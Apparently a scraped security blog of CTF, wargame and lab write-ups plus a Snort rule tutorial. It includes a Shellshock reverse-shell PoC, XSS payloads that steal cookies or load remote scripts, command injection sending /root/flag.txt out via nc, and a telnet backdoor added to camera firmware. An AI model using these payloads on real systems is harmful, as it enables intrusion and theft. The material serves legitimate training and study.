#apt-get install cryptsetup#luksformat -t ext4 /dev/sdb#cryptsetup luksDump /dev/sdb#cryptsetup open --type luks /dev/sdb luks#mount /dev/mapper/luks /mnt/luks#umount /mnt/luks#cryptsetup close luks
# Encrypt with LUKS (Linux Unified Key Setup)
# Vortex wargame: Level 4
#ssh vortex4@vortex.labs.overthewire.org$file /vortex/vortex4$mkdir /tmp/v4$cd /tmp/v4$cat execve.c$gcc -m32 -o execve execve.c$cat getenvaddr.c$gcc -m32 -o getenvaddr getenvaddr.c$cat format_string.py$gdb /vortex/vortex4(gdb)set disassembly-flavor intel(gdb)disassemble main$readelf -r /vortex/vortex4$./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffffff 0804a014 0 104 5`$./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffdf83 0804a014 0 104 5`$./execve /vortex/vortex4 `./format_string.py findinit 0xffffdf85 0804a014 0 104 5`; echo%104 = init $./execve /vortex/vortex4 `./format_string.py exploit 0xffffdf85 0804a014 0 104 5`; echo$whoami$/bin/cat /etc/vortex_pass/vortex5
Labels:
getenvaddr,
overthewire,
relocation,
vortex,
wargame
# NcN CTF 2k14: OST (400 points)
Can you hear it? We neither ;)
#cat pattern.py#./pattern.py ost.wav#cat solution.py#./solution.py ost.wav output#file output#tesseract output flag && cat flag.txt
# NcN CTF 2k14: HIDDENtation (300 points)
Dig deep into the file and find the flag.
#file hiddentation#./patch.py hiddentation r 0x0 0x280#./luks_parser.py hiddentation#cp hiddentation hiddentation.copy#./patch.py hiddentation.copy w 0x3 53#./patch.py hiddentation.copy w 0x220 00ac71f3#./patch.py hiddentation.copy w 0x248 00000708#./patch.py hiddentation.copy r 0x0 0x280#file hiddentation.copy#cryptsetup luksDump hiddentation.copy#while read password; do echo $password; echo -n $password | cryptsetup open --type luks hiddentation.copy volume --key-file - && break; done <<< "`curl --silent http://whnt.com/2014/01/22/the-25-most-common-passwords-of-2013/ | grep '. ' | awk '{print $2}'`"#fdisk -l /dev/mapper/volume#gparted /dev/mapper/volume## offset = 86016 (First sector) * 512 bytes/sector = 44040192 #losetup --offset 44040192 /dev/loop1 /dev/mapper/volume#mount /dev/loop1 /mnt#cat /mnt/flag.txt#testdisk /dev/loop1#dd if=/dev/loop1 of=ntfs skip=69632 count=34816#umount /dev/loop1#losetup -d /dev/loop1#losetup /dev/loop1 ntfs#mount /dev/loop1 /mnt#cat /mnt/readme.txt#umount /dev/loop1#losetup -d /dev/loop1#ntfsundelete --scan ntfs#ntfsundelete --undelete --match flag.txt ntfs#cat flag.txt*#./rot.py -m tracks APAq986942o809qnn32n6987n7422771n53s59r5n1s02rq700ppr43p5196non749r 2>&1 | grep -e '\[' -e 13
References
http://testpurposes.net/2014/10/31/solucion-hiddentation-final-ctf-ncn-2014/
http://cryptsetup.googlecode.com/svn-history/r42/wiki/LUKS-standard/on-disk-format.pdf
Labels:
cryptsetup,
losetup,
luks,
ntfsundelete,
rot13,
testdisk
# Wiener's attack against RSA (small values of d)
Wiener has proved that the attacker may efficiently find d when:
d < (N**0.25)/3
#cat wiener_attack.py#./wiener_attack.py
Reference
http://en.wikipedia.org/wiki/Wiener's_attack
Labels:
continued_fraction,
convergent,
crypto,
rsa,
wiener
# NcN CTF Quals 2k14: eXPLicit (500 points)
#echo 0 > /proc/sys/kernel/randomize_va_space#./explicit
#gdb -q -p `ps axuf | grep explicit | head -n 1 | awk '{print $2}'`(gdb)set disassembly-flavor intel(gdb)set follow-fork-mode child(gdb)continue
#nc 127.0.0.1 7070%n^C
(gdb)backtrace(gdb)x/2i 0x0804f96f-0x5(gdb)quit
#gdb -q -p `ps axuf | grep explicit | head -n 1 | awk '{print $2}'`(gdb)break *0x806ea80(gdb)continue
#nc 127.0.0.1 7070%n
(gdb)x/xw $esp(gdb)quit
# ./checksec.sh --file explicit
# gdb -q -x rop.py
# readelf --section-headers explicit | grep '\.bss'
#cat exploit.py#./exploit.py 127.0.0.1 7070 0xbffff59c>
Another solution using mprotect (based on @esanfelix exploit)
#./search_instructions.py /eXPLicit/explicit mov+eax,0x3 int+0x80# read #./search_instructions.py /eXPLicit/explicit mov+eax,0x7d int+0x80# mprotect #gdb -q explicit(gdb)x/10i 0x805ef4a(gdb)x/10i 0x805fa30#./search_instructions.py /eXPLicit/explicit pop pop pop ret
#cat exploit-mprotect.py#./exploit-mprotect.py 127.0.0.1 7070 0xbffff59c>
# CVE-2014-6271: Bash shellshock
Reverse shell PoC
- Vulnerable server
#a2enmod cgi#sed -i 's/#Include conf-available\/serve-cgi-bin.conf/Include conf-available\/serve-cgi-bin.conf/' /etc/apache2/sites-available/000-default.conf#service apache2 restart#cat /usr/lib/cgi-bin/env.sh
- Client
#ip="192.168.1.1"#nc -v --listen $ip --port=1234
#ip="192.168.1.1"#payload="() { :; }; /bin/bash -c 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc $ip 1234 > /tmp/f'"#url="http://192.168.1.2/cgi-bin/env.sh"#curl --verbose --user-agent "$payload" --referer "$payload" $url
$
Scripts
#cat cve-2014-6271-cmd#./cve-2014-6271-cmd http 127.0.0.1 1580 cgi-bin/env.sh '/bin/uname -a'
Metasploit modules
msf >use auxiliary/scanner/http/apache_mod_cgi_bash_envmsf >use exploits/multi/http/apache_mod_cgi_bash_env_exec
Labels:
bash,
cve,
exploit,
metasploit
# Reverse TCP bind shell setting source port
SERVER#cat sc.asmSERVER#nasm -f elf sc.asm && ld -o sc sc.oCLIENT#nc -lv 127.0.0.1 1234SERVER#./schostnameexitCLIENT#
# WAP Challenge 14: HTTP Traffic File Carving
#url='http://videos.pentesteracademy.com.s3.amazonaws.com/videos/wap-challenges/http-forensics2.pcap'#wget --quiet --output-document=http-forensics2.pcapng $url#editcap -F libpcap -T ether http-forensics2.pcapng http-forensics2.pcap#tshark -nr http-forensics2.pcap | grep octet#cat solution.py#./solution.py#cat split-file/pass
Labels:
pcap,
permutations,
python,
scapy,
zip
# Flashing WVC54GCA with a custom firmware
#file /sbin/init#cat /etc/lsb-release | grep DESC#mkdir wvc54gca#cd wvc54gca#wget http://downloads.linksysbycisco.com/downloads/wvc54gca_v1.00R24.tgz#tar xvzf wvc54gca_v1.00R24.tgz#md5sum wvc54gca_v1.00R24.tgz#apt-get install autotools-dev libncurses5-dev#rm /bin/sh#ln -s /bin/bash /bin/sh#cd source#cat README#cat src/rootfs/etc/init.d/rcS#echo -e "\n# ---- Start Telnet Server (debug) ---- #\n/usr/sbin/telnetd &" >> src/rootfs/etc/init.d/rcS#cat src/rootfs/etc/passwd#openssl passwd -crypt toor#sed -i 's/9szj4G6pgOGeA/TEcqq4feRqPLA/' src/rootfs/etc/passwd#./makeall#file FW/WVC54GCA.bin
Labels:
arm,
cross-compilation,
firmware,
wvc54gca
# Timelapse with WVC54GCA (Linksys IP camera)
Video stream (no audio)
#vlc http://192.168.1.10/img/mjpeg.cgi#vlc http://192.168.1.10/img/video.mjpeg#vlc rtsp://192.168.1.10/img/video.sav
Video stream (audio)
# vlc http://192.168.1.10/img/video.asfSnapshot
#wget --quiet --output-document=image.jpg 'http://192.168.1.10/img/mobile.cgi'#wget --quiet --output-document=image.jpg 'http://192.168.1.10/img/snapshot.cgi?size=X&quality=Y'
- Size:
1 = 160×128
2 = 320×240
3 = 640×480
- Quality:
1 = Very high
2 = High
3 = Normal
4 = Low
5 = Very low
Timelapse
#cat timelapse.sh#./timelapse.sh run#./timelapse.sh make_video
Bonus
# cat cam.sh
# Snort rule structure and syntax
Overview
A rule is a specified set of keywords and arguments used as matching criteria to identify security policy violations.
The engine compares packets against the conditions specified in each rule.
If the packet data matches all the conditions specified in a rule, the rule is triggered.
The action field in the rule specifies what should be done next.
Rules contain two logical sections: the rule header and the rule body.
The rule header
Identifies how to match traffic based on the following criteria:
- Action
- Protocol
- Source IP
- Source port
- Operator
- Destination IP
- Destination port
Example:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTSNote the usage of variables. Makes rule management easier.
Action
The following actions are available in IDS mode:
- alert: Log the event and send an alert message to the output component.
- pass: Ignore the packet.
When your installation is deployed inline:
- Generate Events: Issues console alerts.
- Drop & Generate Events: Block and alert.
- Disabled: Prevents the rule from being enforced thus saving processing cycles.
Protocol
The following protocols are supported:
- TCP
- UDP
- ICMP
- IP
Source and Destination IPs
In all cases, the best practice is to use variables.
The system recognizes only IP addresses and will not accept hostnames.
You cand specify:
- Any IP address, using the keyword 'any'.
- A single IP address.
- A list of IP addresses [192.168.1.1, 192.168.1.5].
- A range of IP addresses 192.168.1.0/24.
- The negation of IP addresses !192.168.1.10.
- A variable previously defined in the snort.conf file.
Source and Destination Ports
You cand specify:
- Any port, using the keyword 'any'.
- A single port.
- A list of ports [21, 23, 80-90]
- A range of ports 80-443.
- The negation of ports !80
- A variable previously defined in the snort.conf file.
Operator: specifying direction
To indicate that a rule triggers against traffic:
- From the source IP to the destination IP, use the directional operator '->'.
- Between the source IP and the destination IP, use the bi-directional operator '<>'.
The rule body
This is where you can specifically drill into a packet and get the content that actually signals malicious or suspicious activity.
The entire body is enclosed in parentheses.
Rule options end in a semicolon (;).
An option is structured as a keyword followed by a colon (:), followed by one or multiple arguments. Arguments are separated by commas (,).
For example:
tag:session, 30, seconds;Options that act on content, apply on the previous argument string of the previous content keyword.
For example:
content:"root"; nocase;A rule can contain multiple content references. They are treated as an AND operation.
For example:
content:"username:"; nocase; content:"password:"; nocase;Defining the event message
alert tcp any any -> $HOME_NET 23 \
(msg:"Suspicious Telnet!";
content:"root"; nocase; \
sid:1000000;)Content MatchesYou can mix hexadecimal content and ASCII content.
content:"|90 90 90 E8 C0 FF FF FF|/bin/sh";You can also negate or exclude content.
content:!"GET";Constraining content matches
-
nocase: To ignore the case in ASCII strings.-
offset: Allows you to specify where the detection engine should start searching for content within a packet (bytes).-
depth: The maximum search depth (bytes) from the offset value.-
distance: The detection engine starts searching for content matches after the specified number of bytes from the previous content match.-
within: The next content match must occur within the specified number of bytes after the end of the last content match including the distance value.Server flow
-
to_client or from_server: Triggers on server responses.-
to_server or from_client: Triggers on client responses.-
established: Triggers on established TCP connections.-
stateless: Triggers regardless of the state of the stream processor.-
no_stream: Does not trigger on rebuilt stream packets.-
only_stream: Triggers only on rebuilt stream packets.Snort ID option
Snort rules all have unique ID numbers.
Custom rules should you a number greater than 1000000.
Rule revision number
Lets you assign a revision number to a rule that you have edited.
Metadata
This is a required option for rules in the Sourcefire system.
You can embed additional information about a rule which other parts of the Snort engine can use.
For example:
metadata:service http;metadata:impact_flag red;Flags
To check if TCP flags are present:
F: FIN
S: SYN
R: RST
P: PSH
A: ACK
U: URG
1: Reserved bit 1
2: Reserved bit 2
0: No flags set
Use the following modifies to change the match criteria:
+: Match on the specified bits plus any others.
*: Match if any of the specified bits are set.
!: Match if the specified bits are not set.
flags:[!|*|+]<FSRPAU120>[,<FSRPAU120>]The optional parameter indicates the flag bits you wish to ignore.
file_data
Sets the cursor used for detection to one of the following buffers:
- When traffic is HTTP:
1. HTTP response body, without chunking/compression/normalization.
2. HTTP de-chunked response body.
3. HTTP normalized response body, when normalized javascript is turned on.
4. HTTP UTF normalized response body, when normalized utf is turned on.
5. All of the above.
- When traffic is SMTP/POP/IMAP:
1. SMTP/POP/IMAP data body, including email headers and MIME when decoding is turned off.
2. Base64 decoded MIME attachment, when b64_decode_depth is greater than -1.
3. Non-Encoded MIME attachment, when bitenc_decode_depth is greater than -1.
4. Quoted-Printable decoded MIME attachment, when qp_decode_depth is greater than -1.
5. Unix-to-unix decoded attachment, when uu_decode_depth is greater than -1.
detection_filter
Replaces the threshold keyword in a rule.
It defines a rate which must be exceeded by source/destination before a rule can generate an event.
Is evaluated as part of the detection phase, just after pattern matching.
Parameters:
-
track by_src or track by_dst.-
count: the number of events.-
seconds: the time over which the count is measured.For example:
detection_filter: track by_src, count 10, seconds 30;The alert will trigger after 10 events are seen from each unique source IP within 30 seconds.
fast_pattern
By default, the longest content statement for each rule is placed into the fast pattern matching engine.
Only if this string is found in a packet, the remaining options in the rule are evaluated.
However, you have the ability to control which piece of content gets placed into the fast pattern matching engine with the fast_pattern rule option.
content:"jumanji"; fast_pattern;fast_pattern:only: the content should only be used for fast pattern matcher and not evaluated as a content rule option.fast_pattern:<offset>,<length>: specify where the fast pattern matcher should look for the content.flowbits
This rule option is used to set tags which can be referenced in subsequent rules.
Parameters:
-
set: sets the specified state for the current flow.-
setx: sets the specified state exclusively.-
unset: unsets the specified states.-
toggle: inverts the specified state.-
isset: checks if the specified state is set.-
isnotset-
noalert: intructs to not generate an alert, regardless of the detection options.-
reset: resets the states on a given flow.flowbits: [set|setx|unset|toggle|isset,isnotset,noalert,reset][,state_name][,group_name]-
state_name: the name that will be referred to in other rules when testing the flowbit.-
group_name: is used to associate multiple flowbits together.byte_jump/test/extract
Gives the ability to seek information within a packet payload where the location of content is not necessarily known but can be obtained.
-
byte_jump: moves the inspection pointer a number of bytes forward.-
byte_test: reads bytes and determine if they are less than, greater than, equal or not equal to a specified value.-
byte_extract: reads bytes and create a variable that represents this value.Case #1: Malformed GIF overflow
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any \ (msg:"FILE-IDENTIFY GIF file magic detected"; \ flow:to_client, established; \ file_data; \ content:"GIF8"; depth:4; fast_pattern; \ content:"a"; within:1; distance:1; \ flowbits:set,file.gif; flowbits:noalert; \ metadata:service http, service imap, service pop3; \ classtype:misc-activity; \ sid:20459; rev:8;)
file_data;, the search for this content starts at the beginning of the file buffer not the payload.flowbits:set,file.gif;, the file.gif flowbit is set.metadata:service http, service imap, service pop3;, using the Adaptive Profiles feature the rule is still being enforced even though the $FILE_DATA_PORTS variable does not include non-standard ports.alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any \ (msg:"FILE-IMAGE Oracle Java Virtual Machine malformed GIF buffer overflow attempt"; \ flow:to_client,established; \ flowbits:isset,file.gif; \ file_data; \ content:"GIF"; \ byte_test:1,!&,128,7,relative; \ content:","; within:1; distance:10; \ content:"|00 00|"; within:2; distance:4; \ metadata:policy security-ips drop, service http, service imap, service pop3; \ reference:bugtraq,22085; reference:cve,2007-0243; \ classtype:attempted-user; \ sid:10062; rev:9;)
flowbits:isset,file.gif;, checks if the file.gif flowbit is set.byte_test:1,!&,128,7,relative;, reads 1 byte at a location 7 bytes away from the DOE's pointer current location. DOE means Detect Offset End. The byte_test returns True if the logical AND between the byte and the mask (10000000b ~ 128d) is equal to 00000000b ~ False => !(False) = True. After this operation, the DOE pointer remains in the same position.content:","; within:1; distance:10;, from the "GIF" match, after 10 bytes and within 1 byte, the value should be a comma.content:"|00 00|"; within:2; distance:4;, from the "," match, after 4 bytes and within 2 bytes, the value should be 0x00 0x00.Case #2: Windows Help Center escape sequence vulnerability
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any \ (msg:"OS_WINDOWS Microsoft Windows Help Center escape sequence XSS attempt"; \ flow:to_client,established; \ file_data; \ content:"hcp|3A 2F 2F|"; nocase; \ content:"script"; distance:0; nocase; \ content:"defer"; distance:0; nocase; \ pcre:"/hcp\x3a\x2f\x2f[^\n]*(\x3c|\x253c)script(\s|\x2520|\x2f)+defer/iO"; \ metadata:policy balanced-ips drop, policy security-ips drop, service http; \ reference:bugtraq,40725; \ reference:cve,2010-1885; \ reference:url,osvdb.org/show/osvdb/65264; \ reference:url,www.microsoft.com/technet/security/bulletin/MS10-042.mspx; \ classtype:attempted-user; \ sid:16665; rev:5;)
The distance:0 without a within, is simply telling the content match has to occur after the previous match, regardless where in the packet.
The use of three content matches before the pcre evaluation speeds up the rule.
hcp\x3a\x2f\x2f[^\n]*, search for hcp:// before no "new lines" characters until the next regex match.(\x3c|\x253c)script, search for a "<" or a "%3c" before the "script" word.(\s|\x2520|\x2f)+defer, search for at least one "whitespace" (space, tab, newline, formfeed, linebreak, ...) or a "%20" or a "/", before the "refer" word.iO, two modifiers; i means case-insensitive and O forces to evaluate the regex, even if it is taking too long.Case #3: The Kaminsky DNS vulnerability
alert udp $EXTERNAL_NET 53 -> $HOME_NET any \ (msg:"PROTOCOL-DNS large number of NXDOMAIN replies - possible DNS cache poisoning"; \ byte_test:1,&,2,3; \ byte_test:1,&,1,3; \ byte_test:1,&,128,2; \ detection_filter:track by_src, count 1200, seconds 30; \ metadata:service dns; \ reference:cve,2008-1447; \ reference:cve,2009-0233; \ reference:url,technet.microsoft.com/en-us/security/bulletin/MS09-008; \ reference:url,www.kb.cert.org/vuls/id/800113; \ classtype:misc-attack; \ sid:13948; rev:10;)
byte_test:1,&,2,3;, reads 1 byte at a location 3 bytes away and returns True if the logical AND between the byte and the mask (00000010b ~ 2d) is not equal to 0. byte_test:1,&,1,3;, reads the previous byte again and returns True if the logical AND between the byte and the mask (00000001b ~ 1d) is not equal to 0. byte_test:1,&,128,2;, reads 1 byte at a location 2 bytes away and returns True if the logical AND between the byte and the mask (10000000b ~ 128d) is not equal to 0. detection_filter:track by_src, count 1200, seconds 30;, sets the threshold that must be met in order for the rule to trigger.Case #4: The content option for overflow detection
alert tcp $EXTERNAL_NET any -> $HOME_NET 4000 \ (msg:"SERVER-OTHER Alt-N SecurityGateway username buffer overflow attempt"; \ flow:to_server, established; \ content:"username=",nocase; \ isdataat:450,relative; \ content:!"|3B|"; within:450; \ content:!"|3A|"; within:450; \ content:!"&"; within:450; \ content:!"|0A|"; within:450; \ metadata:service http;\ policy connectivity-ips drop, policy security-ips drop; \ reference:cve,2008-4193; reference:url,secunia.com/advisories/30497/; \ classtype:attempted-admin; \ sid:13916; rev:9;)
isdataat:450,relative;, verifies if there is 450 bytes after the end of the "username=" string.Next, the engine verifies there is not a colon, semicolon, ampersand and linefeed within 450 bytes of the end of the "username=" string.
References
http://manual.snort.org
# SecuInside CTF Quals 2k14: Reversing - yayaya (100 points)
#xdotool getmouselocation#while [ True ]; do import -window root -delay 0 -crop 400x388-0+112 `date +%d%m%y%H%M%S`-$RANDOM.png; sleep 0.1; done#cat blend-point.py#convert -crop 330x70+0+0 result.png flag.png#xxd -p flag.png | tr -d '\n'
# SecuInside CTF Quals 2k14: Speed Game - Mic Check (7 points)
#./rot.py -m inline -d "Q2QnT29oUNW0wtWqySDbw2UhvRIkTRrby2Qdx2g0UOjbwCHoTRrpw3Ei"#./rot.py -m tracks -d "Q2QnT29oUNW0wtWqySDbw2UhvRIkTRrby2Qdx2g0UOjbwCHoTRrpw3Ei"
Labels:
ctf,
quals,
rot,
secuinside
# OpenVPN with x509 certificates
RSA key, CSR and DH parameter
#openssl genrsa -out server.key 2048#openssl req -new -key server.key -out server.csr#openssl genrsa -out client.key 2048#openssl req -new -key client.key -out client.csr#openssl dhparam -out dh2048.pem 2048
CA and signed certificates
#mkdir demoCA#mkdir demoCA/private#mkdir demoCA/newcerts#echo '01' > demoCA/serial#touch demoCA/index.txt#openssl req -new -x509 -extensions v3_ca -keyout cakey.pem -out cacert.pem -days 3650#mv cakey.pem demoCA/private/.#cp cacert.pem demoCA/.#openssl ca -in server.csr#openssl ca -in client.csr#cp demoCA/newcerts/01.pem server.pem#cp demoCA/newcerts/02.pem client.pem
OpenVPN server configuration
#cat openvpn_server.conf#openvpn openvpn_server.conf
OpenVPN client configuration
#cat openvpn_client.conf#openvpn openvpn_client.conf
OpenVPN Android client configuration - Import profile
#cat openvpn_client.ovpn#Import openvpn_client.ovpn
# XSS game area
Level 1: Hello, world of XSS
https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
Level 2: Persistence is key
https://xss-game.appspot.com/level2/frame
post-content=<img src='foo' onerror='alert("xss")'>
post-content=<img src='foo' onerror='alert(document.cookie)'>
post-content=<img src='foo' onerror='s=document.createElement("script");s.src="//192.168.1.200/xss.js";document.body.appendChild(s)'>
Level 3: That sinking feeling...
https://xss-game.appspot.com/level3/frame#1
URL=https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level 4: Context matters
https://xss-game.appspot.com/level4/frame
timer=');alert('xss
Level 5: Breaking protocol
https://xss-game.appspot.com/level5/frame
URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level 6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
URL=https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
URL=https://xss-game.appspot.com/level6/frame#Https://192.168.1.1/xss.js
URL=https://xss-game.appspot.com/level6/frame#//192.168.1.1/xss.js
Tools
#ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -lextifscgjm#ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -XC
# skipfish -b i -I xss-game.appspot.com -X /css/,/img/ -Z -o report_dir -M -E -U https://xss-game.appspot.comReferences
http://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00
https://www.google.com/about/appsecurity/learning/xss/index.html
https://code.google.com/p/ratproxy/wiki/RatproxyDoc
https://code.google.com/p/skipfish/wiki/SkipfishDoc
# SecOS 1
ht#wget http://download.vulnhub.com/secos/SecOS-1.tar.gzht#md5sum SecOS-1.tar.gzht#tar xvzf SecOS-1.tar.gzht#virtualbox<Run SecOS-1>
Grub solution
GNU GRUB *Ubuntueinit=/bin/bashF10root@(none):/#cat /root/flag.txt | grep -m 1 flagroot@(none):/#mount -o remout,rw /root@(none):/#passwd root<Reboot>
CSRF solution
ht#nmap 192.168.1.1ht#curl --silent http://192.168.1.1:8081ht#curl --silent http://192.168.1.1:8081/hintht#curl --silent --request POST --data 'username=user&password=pass' http://192.168.1.1:8081/sign-upht#curl --silent --request POST --cookie-jar uc --cookie uc --data 'username=user&password=pass' http://192.168.1.1:8081/loginht#curl --silent --cookie-jar uc --cookie uc http://192.168.1.1:8081/usersht#curl --silent --request POST --cookie-jar uc --cookie uc --data 'to=spiderman&message=http://192.168.1.2:8000/csrf.html' http://192.168.1.1:8081/send-messageht#cat csrf.htmlht#python -m SimpleHTTPServerht#curl --silent --request POST --cookie-jar sc --cookie sc --data 'username=spiderman&password=pass' http://192.168.1.1:8081/loginht#curl --silent --cookie-jar sc --cookie sc http://192.168.1.1:8081/messages | grep Wellht#ssh spiderman@192.168.1.1CrazyPassword!spiderman@SecOS-1:~$crontab -espiderman@SecOS-1:~$ps axuf | grep sudospiderman@SecOS-1:~$cat /home/spiderman/vnwa/internalServer.jsspiderman@SecOS-1:~$curl --silent --request POST --data 'ip=-c 1 127.0.0.1; nc 192.168.1.2 1234 < /root/flag.txt' http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234 | grep -m 1 flag
spiderman@SecOS-1:~$function encode { echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'; }spiderman@SecOS-1:~$encoded=`encode '-c 1 127.0.0.1; if [ ! -p /tmp/f ]; then mkfifo /tmp/f; fi ; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 1234 > /tmp/f'`spiderman@SecOS-1:~$curl --silent --request POST --data "ip=$encoded" http://127.0.0.1:9000
ht#ncat -l 192.168.1.2 1234#hostname#whoami
# PicoCTF 2k13 - moreevil
#gdb -q -n -x moreevil.py#gdb -q -n -x moreevil.py#gdb moreevil(gdb)set environment LD_PRELOAD=lib/hook64.so(gdb)break *0x4021ee(gdb)run1234567890123456789(gdb)x/152xb 0x6030c8#ipythonIn [1]:key = [0x19, 0x1e, 0x06, 0x51, 0x1d, 0x1e, 0x06, 0x51, 0x12, 0x10, 0x1f, 0x51, 0x08, 0x1e, 0x04, 0x51, 0x16, 0x1e, 0x4e]In [2]:password = ''In [3]:for byte in key: password += chr(byte ^ ord('q'))In [4]:passwordOut[4]:
Subscribe to:
Posts (Atom)